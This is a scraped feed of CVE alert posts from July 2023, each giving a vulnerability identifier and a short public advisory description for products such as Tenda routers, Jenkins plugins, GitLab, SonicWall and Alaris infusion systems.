🚨 CVE-2023-37719Tenda F1202 V1.0BR_V1.2.0.20(408), FH1202_V1.2.0.19_EN were discovered to contain a stack overflow in the page parameter in the function fromP2pListFilter.🎖@cveNotify |
|
| 2023-07-14 06:58:13 |
🚨 CVE-2023-37722Tenda F1202 V1.0BR_V1.2.0.20(408), FH1202_V1.2.0.19_EN were discovered to contain a stack overflow in the page parameter in the function fromSafeUrlFilter.🎖@cveNotify |
|
| 2023-07-14 00:58:32 |
🚨 CVE-2023-3342The User Registration plugin for WordPress is vulnerable to arbitrary file uploads due to a hardcoded encryption key and missing file type validation on the 'ur_upload_profile_pic' function in versions up to, and including, 3.0.2. This makes it possible for authenticated attackers with subscriber-level capabilities or above to upload arbitrary files on the affected site's server which may make remote code execution possible. This was partially patched in version 3.0.2 and fully patched in version 3.0.2.1.🎖@cveNotify |
|
| 2023-07-14 00:58:31 |
🚨 CVE-2023-37954A cross-site request forgery (CSRF) vulnerability in Jenkins Rebuilder Plugin 320.v5a_0933a_e7d61 and earlier allows attackers to rebuild a previous build.🎖@cveNotify |
|
| 2023-07-14 00:58:30 |
🚨 CVE-2023-37942Jenkins External Monitor Job Type Plugin 206.v9a_94ff0b_4a_10 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.🎖@cveNotify |
|
| 2023-07-14 00:58:29 |
🚨 CVE-2023-37945A missing permission check in Jenkins SAML Single Sign On(SSO) Plugin 2.1.0 through 2.3.0 (both inclusive) allows attackers with Overall/Read permission to download a string representation of the current security realm.🎖@cveNotify |
|
| 2023-07-14 00:58:26 |
🚨 CVE-2023-37946Jenkins OpenShift Login Plugin 1.1.0.227.v27e08dfb_1a_20 and earlier does not invalidate the previous session on login.🎖@cveNotify |
|
| 2023-07-14 00:58:25 |
🚨 CVE-2023-37948Jenkins Oracle Cloud Infrastructure Compute Plugin 1.0.16 and earlier does not validate SSH host keys when connecting OCI clouds, enabling man-in-the-middle attacks.🎖@cveNotify |
|
| 2023-07-14 00:58:24 |
🚨 CVE-2023-37950A missing permission check in Jenkins mabl Plugin 0.0.46 and earlier allows attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins.🎖@cveNotify |
|
| 2023-07-14 00:58:23 |
🚨 CVE-2023-37952A cross-site request forgery (CSRF) vulnerability in Jenkins mabl Plugin 0.0.46 and earlier allows attackers to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.🎖@cveNotify |
|
| 2023-07-14 00:58:20 |
🚨 CVE-2023-37953A missing permission check in Jenkins mabl Plugin 0.0.46 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.🎖@cveNotify |
|
| 2023-07-14 00:58:19 |
🚨 CVE-2023-37956A missing permission check in Jenkins Test Results Aggregator Plugin 1.2.13 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified credentials.🎖@cveNotify |
|
| 2023-07-14 00:58:18 |
🚨 CVE-2023-37958A cross-site request forgery (CSRF) vulnerability in Jenkins Sumologic Publisher Plugin 2.2.1 and earlier allows attackers to connect to an attacker-specified URL.🎖@cveNotify |
|
| 2023-07-14 00:58:14 |
🚨 CVE-2023-37959A missing permission check in Jenkins Sumologic Publisher Plugin 2.2.1 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified URL.🎖@cveNotify |
|
| 2023-07-14 00:58:13 |
🚨 CVE-2023-37962A cross-site request forgery (CSRF) vulnerability in Jenkins Benchmark Evaluator Plugin 1.0.1 and earlier allows attackers to connect to an attacker-specified URL and to check for the existence of directories, `.csv`, and `.ycsb` files on the Jenkins controller file system.🎖@cveNotify |
|
| 2023-07-14 00:58:12 |
🚨 CVE-2023-37964A cross-site request forgery (CSRF) vulnerability in Jenkins ElasticBox CI Plugin 5.0.1 and earlier allows attackers to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.🎖@cveNotify |
|
| 2023-07-13 22:58:34 |
🚨 CVE-2023-33157Microsoft SharePoint Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-07-13 22:58:33 |
🚨 CVE-2023-33160Microsoft SharePoint Server Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-07-13 22:58:32 |
🚨 CVE-2023-33159Microsoft SharePoint Server Spoofing Vulnerability🎖@cveNotify |
|
| 2023-07-13 22:58:30 |
🚨 CVE-2023-33134Microsoft SharePoint Server Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-07-13 22:58:26 |
🚨 CVE-2023-33148Microsoft Office Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-07-13 22:58:25 |
🚨 CVE-2023-30561The data flowing between the PCU and its modules is insecure. A threat actor with physical access could potentially read or modify data by attaching a specially crafted device while an infusion is running.🎖@cveNotify |
|
| 2023-07-13 22:58:24 |
🚨 CVE-2023-30562A GRE dataset file within Systems Manager can be tampered with and distributed to PCUs. 🎖@cveNotify |
|
| 2023-07-13 22:58:23 |
🚨 CVE-2023-30563A malicious file could be uploaded into a System Manager User Import Function resulting in a hijacked session.🎖@cveNotify |
|
| 2023-07-13 22:58:20 |
🚨 CVE-2023-30564Alaris Systems Manager does not perform input validation during the Device Import Function.🎖@cveNotify |
|
| 2023-07-13 22:58:19 |
🚨 CVE-2023-30565An insecure connection between Systems Manager and CQI Reporter application could expose infusion data to an attacker.🎖@cveNotify |
|
| 2023-07-13 22:58:18 |
🚨 CVE-2023-32042OLE Automation Information Disclosure Vulnerability🎖@cveNotify |
|
| 2023-07-13 22:58:17 |
🚨 CVE-2023-32050Windows Installer Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-07-13 22:58:14 |
🚨 CVE-2023-32047Paint 3D Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-07-13 22:58:13 |
🚨 CVE-2023-32039Microsoft PostScript and PCL6 Class Printer Driver Information Disclosure Vulnerability🎖@cveNotify |
|
| 2023-07-13 22:58:12 |
🚨 CVE-2023-32046Windows MSHTML Platform Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-07-13 21:58:29 |
🚨 CVE-2023-37710Tenda AC1206 V15.03.06.23 and AC10 V15.03.06.47 were discovered to contain a stack overflow in the wpapsk_crypto parameter in the fromSetWirelessRepeat function.🎖@cveNotify |
|
| 2023-07-13 21:58:25 |
🚨 CVE-2023-37711Tenda AC1206 V15.03.06.23 and AC10 V15.03.06.47 were discovered to contain a stack overflow in the deviceId parameter in the saveParentControlInfo function.🎖@cveNotify |
|
| 2023-07-13 21:58:24 |
🚨 CVE-2023-21526Windows Netlogon Information Disclosure Vulnerability🎖@cveNotify |
|
| 2023-07-13 21:58:23 |
🚨 CVE-2023-37701Tenda FH1203 V2.0.1.6 was discovered to contain a stack overflow via the deviceId parameter in the addWifiMacFilter function.🎖@cveNotify |
|
| 2023-07-13 21:58:19 |
🚨 CVE-2023-37702Tenda FH1203 V2.0.1.6 was discovered to contain a stack overflow via the deviceId parameter in the formSetDeviceName function.🎖@cveNotify |
|
| 2023-07-13 21:58:18 |
🚨 CVE-2023-37704Tenda FH1203 V2.0.1.6 was discovered to contain a stack overflow via the deviceId parameter in the formSetClientState function.🎖@cveNotify |
|
| 2023-07-13 21:58:17 |
🚨 CVE-2023-37707Tenda FH1203 V2.0.1.6 was discovered to contain a stack overflow via the page parameter in the fromVirtualSer function.🎖@cveNotify |
|
| 2023-07-13 21:58:13 |
🚨 CVE-2023-29347Windows Admin Center Spoofing Vulnerability🎖@cveNotify |
|
| 2023-07-13 21:58:12 |
🚨 CVE-2023-36994In TravianZ 8.3.4 and 8.3.3, Incorrect Access Control in the installation script allows an attacker to overwrite the server configuration and inject PHP code.🎖@cveNotify |
|
| 2023-07-13 21:58:11 |
🚨 CVE-2023-36993The cryptographically insecure random number generator being used in TravianZ 8.3.4 and 8.3.3 in the password reset function allows an attacker to guess the password reset.parameters and to take over accounts.🎖@cveNotify |
|
| 2023-07-13 19:58:37 |
🚨 CVE-2023-37067Chamilo 1.11.x up to 1.11.20 allows users with admin privilege account to insert XSS in the classes/usergroups management section.🎖@cveNotify |
|
| 2023-07-13 19:58:36 |
🚨 CVE-2022-39254matrix-nio is a Python Matrix client library, designed according to sans I/O principles. Prior to version 0.20, when a users requests a room key from their devices, the software correctly remember the request. Once they receive a forwarded room key, they accept it without checking who the room key came from. This allows homeservers to try to insert room keys of questionable validity, potentially mounting an impersonation attack. Version 0.20 fixes the issue.🎖@cveNotify |
|
| 2023-07-13 19:58:35 |
🚨 CVE-2022-39243NuProcess is an external process execution implementation for Java. In all the versions of NuProcess where it forks processes by using the JVM's Java_java_lang_UNIXProcess_forkAndExec method (1.2.0+), attackers can use NUL characters in their strings to perform command line injection. Java's ProcessBuilder isn't vulnerable because of a check in ProcessBuilder.start. NuProcess is missing that check. This vulnerability can only be exploited to inject command line arguments on Linux. Version 2.0.5 contains a patch. As a workaround, users of the library can sanitize command strings to remove NUL characters prior to passing them to NuProcess for execution.🎖@cveNotify |
|
| 2023-07-13 19:58:34 |
🚨 CVE-2022-39245Mist is the command-line interface for the makedeb Package Repository. Prior to version 0.9.5, a user-provided `sudo` binary via the `PATH` variable can allow a local user to run arbitrary commands on the user's system with root permissions. Versions 0.9.5 and later contain a patch. No known workarounds exist.🎖@cveNotify |
|
| 2023-07-13 19:58:33 |
🚨 CVE-2022-40150Those using Jettison to parse untrusted XML or JSON data may be vulnerable to Denial of Service attacks (DOS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by Out of memory. This effect may support a denial of service attack.🎖@cveNotify |
|
| 2023-07-13 19:58:32 |
🚨 CVE-2022-39207Onedev is an open source, self-hosted Git Server with CI/CD and Kanban. During CI/CD builds, it is possible to save build artifacts for later retrieval. They can be accessed through OneDev's web UI after the successful run of a build. These artifact files are served by the webserver in the same context as the UI without any further restrictions. This leads to Cross-Site Scripting (XSS) when a user creates a build artifact that contains HTML. When accessing the artifact, the content is rendered by the browser, including any JavaScript that it contains. Since all cookies (except for the rememberMe one) do not set the HttpOnly flag, an attacker could steal the session of a victim and use it to impersonate them. To exploit this issue, attackers need to be able to modify the content of artifacts, which usually means they need to be able to modify a project's build spec. The exploitation requires the victim to click on an attacker's link. It can be used to elevate privileges by targeting admins of a OneDev instance. In the worst case, this can lead to arbitrary code execution on the server, because admins can create Server Shell Executors and use them to run any command on the server. This issue has been patched in version 7.3.0. Users are advised to upgrade. There are no known workarounds for this issue.🎖@cveNotify |
|
| 2023-07-13 19:58:30 |
🚨 CVE-2023-23907A directory traversal vulnerability exists in the server.js start functionality of Milesight VPN v2.0.2. A specially-crafted network request can lead to arbitrary file read. An attacker can send a network request to trigger this vulnerability.🎖@cveNotify |
|
| 2023-07-13 19:58:29 |
🚨 CVE-2023-22844An authentication bypass vulnerability exists in the requestHandlers.js verifyToken functionality of Milesight VPN v2.0.2. A specially-crafted network request can lead to authentication bypass. An attacker can send a network request to trigger this vulnerability.🎖@cveNotify |
|
| 2023-07-13 19:58:28 |
🚨 CVE-2023-23550An OS command injection vulnerability exists in the ys_thirdparty user_delete functionality of Milesight UR32L v32.3.0.5. A specially crafted network packet can lead to command execution. An attacker can send a sequence of requests to trigger this vulnerability.🎖@cveNotify |
|
| 2023-07-13 19:58:27 |
🚨 CVE-2023-23571An access violation vulnerability exists in the eventcore functionality of Milesight UR32L v32.3.0.5. A specially crafted network request can lead to denial of service. An attacker can send a network request to trigger this vulnerability.🎖@cveNotify |
|
| 2023-07-13 19:58:23 |
🚨 CVE-2023-22659An os command injection vulnerability exists in the libzebra.so change_hostname functionality of Milesight UR32L v32.3.0.5. A specially-crafted network packets can lead to command execution. An attacker can send a sequence of requests to trigger this vulnerability.🎖@cveNotify |
|
| 2023-07-13 19:58:22 |
🚨 CVE-2022-23460Jsonxx or Json++ is a JSON parser, writer and reader written in C++. In affected versions of jsonxx json parsing may lead to stack exhaustion in an address sanitized (ASAN) build. This issue may lead to Denial of Service if the program using the jsonxx library crashes. This issue exists on the current commit of the jsonxx project and the project itself has been archived. Updates are not expected. Users are advised to find a replacement.🎖@cveNotify |
|
| 2023-07-13 19:58:21 |
🚨 CVE-2022-23459Jsonxx or Json++ is a JSON parser, writer and reader written in C++. In affected versions of jsonxx use of the Value class may lead to memory corruption via a double free or via a use after free. The value class has a default assignment operator which may be used with pointer types which may point to alterable data where the pointer itself is not updated. This issue exists on the current commit of the jsonxx project. The project itself has been archived and updates are not expected. Users are advised to find a replacement.🎖@cveNotify |
|
| 2023-07-13 19:58:20 |
🚨 CVE-2023-30151A SQL injection vulnerability in the Boxtal (envoimoinscher) module for PrestaShop, after version 3.1.10, allows remote authenticated users to execute arbitrary SQL commands via the `key` GET parameter.🎖@cveNotify |
|
| 2023-07-13 19:58:15 |
🚨 CVE-2023-37746A cross-site scripting (XSS) vulnerability in Maid Hiring Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title parameter of the /admin/contactus.php component.🎖@cveNotify |
|
| 2023-07-13 19:58:14 |
🚨 CVE-2023-37785A cross-site scripting (XSS) vulnerability in ImpressCMS v1.4.5 and before allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the smile_code parameter of the component /editprofile.php.🎖@cveNotify |
|
| 2023-07-13 19:58:13 |
🚨 CVE-2023-37786Multiple cross-site scripting (XSS) vulnerabilities in Geeklog v2.2.2 allow attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Mail Settings[backend], Mail Settings[host], Mail Settings[port] and Mail Settings[auth] parameters of the /admin/configuration.php.🎖@cveNotify |
|
| 2023-07-13 19:58:12 |
🚨 CVE-2023-37787Multiple cross-site scripting (XSS) vulnerabilities in Geeklog v2.2.2 allow attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Rule and Route parameters of /admin/router.php.🎖@cveNotify |
|
| 2023-07-13 16:58:28 |
🚨 CVE-2022-23563Tensorflow is an Open Source Machine Learning Framework. In multiple places, TensorFlow uses `tempfile.mktemp` to create temporary files. While this is acceptable in testing, in utilities and libraries it is dangerous as a different process can create the file between the check for the filename in `mktemp` and the actual creation of the file by a subsequent operation (a TOC/TOU type of weakness). In several instances, TensorFlow was supposed to actually create a temporary directory instead of a file. This logic bug is hidden away by the `mktemp` function usage. We have patched the issue in several commits, replacing `mktemp` with the safer `mkstemp`/`mkdtemp` functions, according to the usage pattern. Users are advised to upgrade as soon as possible.🎖@cveNotify |
|
| 2023-07-13 16:58:24 |
🚨 CVE-2022-23572Tensorflow is an Open Source Machine Learning Framework. Under certain scenarios, TensorFlow can fail to specialize a type during shape inference. This case is covered by the `DCHECK` function however, `DCHECK` is a no-op in production builds and an assertion failure in debug builds. In the first case execution proceeds to the `ValueOrDie` line. This results in an assertion failure as `ret` contains an error `Status`, not a value. In the second case we also get a crash due to the assertion failure. The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, and TensorFlow 2.6.3, as these are also affected and still in supported range.🎖@cveNotify |
|
| 2023-07-13 16:58:23 |
🚨 CVE-2022-23580Tensorflow is an Open Source Machine Learning Framework. During shape inference, TensorFlow can allocate a large vector based on a value from a tensor controlled by the user. The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range.🎖@cveNotify |
|
| 2023-07-13 16:58:22 |
🚨 CVE-2022-23223The HTTP response will disclose the user password. This issue affected Apache ShenYu 2.4.0 and 2.4.1.🎖@cveNotify |
|
| 2023-07-13 16:58:21 |
🚨 CVE-2023-37267Umbraco is a ASP.NET CMS. Under rare conditions a restart of Umbraco can allow unauthorized users access to admin-level permissions. This vulnerability was patched in versions 10.6.1, 11.4.2 and 12.0.1.🎖@cveNotify |
|
| 2023-07-13 16:58:17 |
🚨 CVE-2023-31819An issue found in KEISEI STORE Co, Ltd. LIVRE KEISEI v.13.6.1 allows a remote attacker to gain access to sensitive information via the channel access token in the miniapp function.🎖@cveNotify |
|
| 2023-07-13 16:58:16 |
🚨 CVE-2023-31820An issue found in Shizutetsu Store v.13.6.1 allows a remote attacker to gain access to sensitive information via the channel access token in the miniapp function.🎖@cveNotify |
|
| 2023-07-13 16:58:15 |
🚨 CVE-2023-31825An issue found in Inageya v.13.4.1 allows a remote attacker to gain access to sensitive information via the channel access token in the miniapp Inageya function.🎖@cveNotify |
|
| 2023-07-13 16:58:14 |
🚨 CVE-2023-35070Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in VegaGroup Web Collection allows SQL Injection.This issue affects Web Collection: before 31197.🎖@cveNotify |
|
| 2023-07-13 14:58:23 |
🚨 CVE-2023-20185A vulnerability in the Cisco ACI Multi-Site CloudSec encryption feature of Cisco Nexus 9000 Series Fabric Switches in ACI mode could allow an unauthenticated, remote attacker to read or modify intersite encrypted traffic. This vulnerability is due to an issue with the implementation of the ciphers that are used by the CloudSec encryption feature on affected switches. An attacker with an on-path position between the ACI sites could exploit this vulnerability by intercepting intersite encrypted traffic and using cryptanalytic techniques to break the encryption. A successful exploit could allow the attacker to read or modify the traffic that is transmitted between the sites. Cisco has not released and will not release software updates that address this vulnerability.🎖@cveNotify |
|
| 2023-07-13 14:58:22 |
🚨 CVE-2019-14815A vulnerability was found in Linux Kernel, where a Heap Overflow was found in mwifiex_set_wmm_params() function of Marvell Wifi Driver.🎖@cveNotify |
|
| 2023-07-13 14:58:21 |
🚨 CVE-2023-25948Server information leak of configuration data when an error is generated in response to a specially crafted message.🎖@cveNotify |
|
| 2023-07-13 14:58:16 |
🚨 CVE-2023-26597Controller DoS due to buffer overflow in the handling of a specially crafted message received by the controller.🎖@cveNotify |
|
| 2023-07-13 14:58:15 |
🚨 CVE-2023-2003Embedded malicious code vulnerability in Vision1210, in the build 5 of operating system version 4.3, which could allow a remote attacker to store base64-encoded malicious code in the device's data tables via the PCOM protocol, which can then be retrieved by a client and executed on the device.🎖@cveNotify |
|
| 2023-07-13 14:58:14 |
🚨 CVE-2023-3660A vulnerability was found in Campcodes Retro Cellphone Online Store 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /admin/add_user_modal.php. The manipulation of the argument un leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-234014 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-07-13 14:58:13 |
🚨 CVE-2023-3657A vulnerability, which was classified as critical, has been found in SourceCodester AC Repair and Services System 1.0. This issue affects some unknown processing of the file Master.php?f=save_book of the component HTTP POST Request Handler. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-234011.🎖@cveNotify |
|
| 2023-07-13 12:58:31 |
🚨 CVE-2023-24474Experion server may experience a DoS due to a heap overflow which could occur when handling a specially crafted message🎖@cveNotify |
|
| 2023-07-13 12:58:30 |
🚨 CVE-2023-24480Controller DoS due to stack overflow when decoding a message from the server🎖@cveNotify |
|
| 2023-07-13 12:58:26 |
🚨 CVE-2023-25178Controller may be loaded with malicious firmware which could enable remote code execution🎖@cveNotify |
|
| 2023-07-13 12:58:25 |
🚨 CVE-2023-3658A vulnerability, which was classified as critical, was found in SourceCodester AC Repair and Services System 1.0. Affected is an unknown function of the file Master.php?f=delete_book of the component HTTP POST Request Handler. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The identifier of this vulnerability is VDB-234012.🎖@cveNotify |
|
| 2023-07-13 12:58:24 |
🚨 CVE-2023-3659A vulnerability has been found in SourceCodester AC Repair and Services System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file admin/?page=user/manage_user. The manipulation of the argument firstname/middlename leads to cross site scripting. The attack can be launched remotely. The identifier VDB-234013 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-07-13 12:58:23 |
🚨 CVE-2023-29452Currently, geomap configuration (Administration -> General -> Geographical maps) allows using HTML in the field “Attribution text” when selected “Other” Tile provider.🎖@cveNotify |
|
| 2023-07-13 12:58:20 |
🚨 CVE-2023-22435Experion server may experience a DoS due to a stack overflow when handling a specially crafted message.🎖@cveNotify |
|
| 2023-07-13 12:58:19 |
🚨 CVE-2023-23585Experion server DoS due to heap overflow occurring during the handling of a specially crafted message for a specific configuration operation.🎖@cveNotify |
|
| 2023-07-13 12:58:18 |
🚨 CVE-2023-3657A vulnerability, which was classified as critical, has been found in SourceCodester AC Repair and Services System 1.0. This issue affects some unknown processing of the file Master.php?f=save_book of the component HTTP POST Request Handler. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-234011.🎖@cveNotify |
|
| 2023-07-13 12:58:17 |
🚨 CVE-2023-29454 Stored or persistent cross-site scripting (XSS) is a type of XSS where the attacker first sends the payload to the web application, then the application saves the payload (e.g., in a database or server-side text files), and finally, the application unintentionally executes the payload for every victim visiting its web pages.🎖@cveNotify |
|
| 2023-07-13 12:58:14 |
🚨 CVE-2023-29456URL validation scheme receives input from a user and then parses it to identify its various components. The validation scheme can ensure that all URL components comply with internet standards.🎖@cveNotify |
|
| 2023-07-13 12:58:13 |
🚨 CVE-2023-29457Reflected XSS attacks, occur when a malicious script is reflected off a web application to the victim's browser. The script can be activated through Action form fields, which can be sent as request to a website with a vulnerability that enables execution of malicious scripts.🎖@cveNotify |
|
| 2023-07-13 12:58:12 |
🚨 CVE-2023-29451Specially crafted string can cause a buffer overrun in the JSON parser library leading to a crash of the Zabbix Server or a Zabbix Proxy.🎖@cveNotify |
|
| 2023-07-13 12:58:11 |
🚨 CVE-2023-29455Reflected XSS attacks, also known as non-persistent attacks, occur when a malicious script is reflected off a web application to the victim's browser. The script is activated through a link, which sends a request to a website with a vulnerability that enables execution of malicious scripts.🎖@cveNotify |
|
| 2023-07-13 11:58:31 |
🚨 CVE-2023-21247In getAvailabilityStatus of BluetoothScanningMainSwitchPreferenceController.java, there is a possible way to bypass a device policy restriction due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-07-13 11:58:30 |
🚨 CVE-2023-21257In updateSettingsInternalLI of InstallPackageHelper.java, there is a possible way to sideload an app in the work profile due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-07-13 11:58:29 |
🚨 CVE-2023-35691there is a possible out of bounds read due to a missing bounds check. This could lead to remote denial of service with System execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-07-13 11:58:25 |
🚨 CVE-2023-20918In getPendingIntentLaunchFlags of ActivityOptions.java, there is a possible elevation of privilege due to a confused deputy with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-07-13 11:58:24 |
🚨 CVE-2023-37566ELECOM wireless LAN routers WRC-1167GHBK3-A v1.24 and earlier, and WRC-1167FEBK-A v1.18 and earlier allow a network-adjacent authenticated attacker to execute an arbitrary command by sending a specially crafted request to the web management page.🎖@cveNotify |
|
| 2023-07-13 11:58:23 |
🚨 CVE-2023-21145In updatePictureInPictureMode of ActivityRecord.java, there is a possible bypass of background launch restrictions due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-07-13 11:58:19 |
🚨 CVE-2023-21243In validateForCommonR1andR2 of PasspointConfiguration.java, there is a possible way to inflate the size of a config file with no limits due to a buffer overflow. This could lead to local denial of service with no additional execution privileges needed. User interaction is needed for exploitation.🎖@cveNotify |
|
| 2023-07-13 11:58:18 |
🚨 CVE-2023-35694In DMPixelLogger_ProcessDmCommand of DMPixelLogger.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-07-13 11:58:17 |
🚨 CVE-2023-21260In notification access permission dialog box, malicious application can embedded a very long service label that overflow the original user prompt and possibly contains mis-leading information to be appeared as a system message for user confirmation.🎖@cveNotify |
|
| 2023-07-13 11:58:13 |
🚨 CVE-2023-37561Open redirect vulnerability in ELECOM wireless LAN routers and ELECOM wireless LAN repeaters allows a remote unauthenticated attacker to redirect users to arbitrary web sites and conduct phishing attacks via a specially crafted URL. Affected products and versions are as follows: WRH-300WH-H v2.12 and earlier, WTC-300HWH v1.09 and earlier, WTC-C1167GC-B v1.17 and earlier, and WTC-C1167GC-W v1.17 and earlier.🎖@cveNotify |
|
| 2023-07-13 11:58:12 |
🚨 CVE-2023-2576An issue has been discovered in GitLab CE/EE affecting all versions starting from 13.7 before 15.11.10, all versions starting from 16.0 before 16.0.6, all versions starting from 16.1 before 16.1.1. This allowed a developer to remove the CODEOWNERS rules and merge to a protected branch.🎖@cveNotify |
|
| 2023-07-13 11:58:11 |
🚨 CVE-2023-2620An issue has been discovered in GitLab CE/EE affecting all versions starting from 15.1 prior to 15.11.10, all versions from 16.0 prior to 16.0.6, all versions from 16.1 prior to 16.1.1. A maintainer could modify a webhook URL to leak masked webhook secrets by manipulating other masked portions. This addresses an incomplete fix for CVE-2023-0838.🎖@cveNotify |
|
| 2023-07-13 05:59:17 |
🚨 CVE-2023-3343The User Registration plugin for WordPress is vulnerable to PHP Object Injection in versions up to, and including, 3.0.1 via deserialization of untrusted input from the 'profile-pic-url' parameter. This allows authenticated attackers, with subscriber-level permissions and above, to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.🎖@cveNotify |
|
| 2023-07-13 05:59:09 |
🚨 CVE-2023-3362An information disclosure issue in GitLab CE/EE affecting all versions from 16.0 prior to 16.0.6, and version 16.1.0 allows unauthenticated actors to access the import error information if a project was imported from GitHub.🎖@cveNotify |
|
| 2023-07-13 05:59:06 |
🚨 CVE-2023-3363An information disclosure issue in Gitlab CE/EE affecting all versions from 13.6 prior to 15.11.10, all versions from 16.0 prior to 16.0.6, all versions from 16.1 prior to 16.1.1, resulted in the Sidekiq log including webhook tokens when the log format was set to `default`.🎖@cveNotify |
|
| 2023-07-13 05:59:04 |
🚨 CVE-2023-3424An issue has been discovered in GitLab CE/EE affecting all versions starting from 10.3 before 15.11.10, all versions starting from 16.0 before 16.0.6, all versions starting from 16.1 before 16.1.1. A Regular Expression Denial of Service was possible via sending crafted payloads to the preview_markdown endpoint.🎖@cveNotify |
|
| 2023-07-13 05:59:01 |
🚨 CVE-2023-3444An issue has been discovered in GitLab CE/EE affecting all versions starting from 15.3 before 15.11.10, all versions starting from 16.0 before 16.0.6, all versions starting from 16.1 before 16.1.1, which allows an attacker to merge arbitrary code into protected branches.🎖@cveNotify |
|
| 2023-07-13 05:58:58 |
🚨 CVE-2023-2200An issue has been discovered in GitLab CE/EE affecting all versions starting from 7.14 before 15.11.10, all versions starting from 16.0 before 16.0.6, all versions starting from 16.1 before 16.1.1, which allows an attacker to inject HTML in an email address field.🎖@cveNotify |
|
| 2023-07-13 05:58:55 |
🚨 CVE-2023-34131Exposure of sensitive information to an unauthorized actor vulnerability in SonicWall GMS and Analytics enables an unauthenticated attacker to access restricted web pages. This issue affects GMS: 9.3.2-SP1 and earlier versions; Analytics: 2.5.0.4-R7 and earlier versions.🎖@cveNotify |
|
| 2023-07-13 05:58:52 |
🚨 CVE-2023-34133Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in SonicWall GMS and Analytics allows an unauthenticated attacker to extract sensitive information from the application database. This issue affects GMS: 9.3.2-SP1 and earlier versions; Analytics: 2.5.0.4-R7 and earlier versions.🎖@cveNotify |
|
| 2023-07-13 05:58:49 |
🚨 CVE-2023-34134Exposure of sensitive information to an unauthorized actor vulnerability in SonicWall GMS and Analytics allows authenticated attacker to read administrator password hash via a web service call. This issue affects GMS: 9.3.2-SP1 and earlier versions; Analytics: 2.5.0.4-R7 and earlier versions.🎖@cveNotify |
|
| 2023-07-13 05:58:46 |
🚨 CVE-2023-34137SonicWall GMS and Analytics CAS Web Services application use static values for authentication without proper checks leading to authentication bypass vulnerability. This issue affects GMS: 9.3.2-SP1 and earlier versions; Analytics: 2.5.0.4-R7 and earlier versions.🎖@cveNotify |
|
| 2023-07-13 05:58:43 |
🚨 CVE-2023-37563Exposure of sensitive information to an unauthorized actor issue exists in ELECOM wireless LAN routers, which allows a network-adjacent attacker to obtain sensitive information. Affected products and versions are as follows: WRC-1167GHBK-S v1.03 and earlier, WRC-1167GEBK-S v1.03 and earlier, WRC-1167FEBK-S v1.04 and earlier, WRC-1167GHBK3-A v1.24 and earlier, and WRC-1167FEBK-A v1.18 and earlier.🎖@cveNotify |
|
| 2023-07-13 05:58:41 |
🚨 CVE-2023-37562Cross-site request forgery (CSRF) vulnerability in exists in WTC-C1167GC-B v1.17 and earlier, and WTC-C1167GC-W v1.17 and earlier. If a user views a malicious page while logged in, unintended operations may be performed.🎖@cveNotify |
|
| 2023-07-13 05:58:38 |
🚨 CVE-2023-3342The User Registration plugin for WordPress is vulnerable to arbitrary file uploads due to a hardcoded encryption key and missing file type validation on the 'ur_upload_profile_pic' function in versions up to, and including, 3.0.2. This makes it possible for authenticated attackers with subscriber-level capabilities or above to upload arbitrary files on the affected site's server which may make remote code execution possible. This was partially patched in version 3.0.2 and fully patched in version 3.0.2.1.🎖@cveNotify |
|
| 2023-07-13 05:58:35 |
🚨 CVE-2019-5997Video Insight VMS versions prior to 7.6.1 allow remote attackers to conduct code injection attacks via unspecified vectors.🎖@cveNotify |
|
| 2023-07-13 05:58:32 |
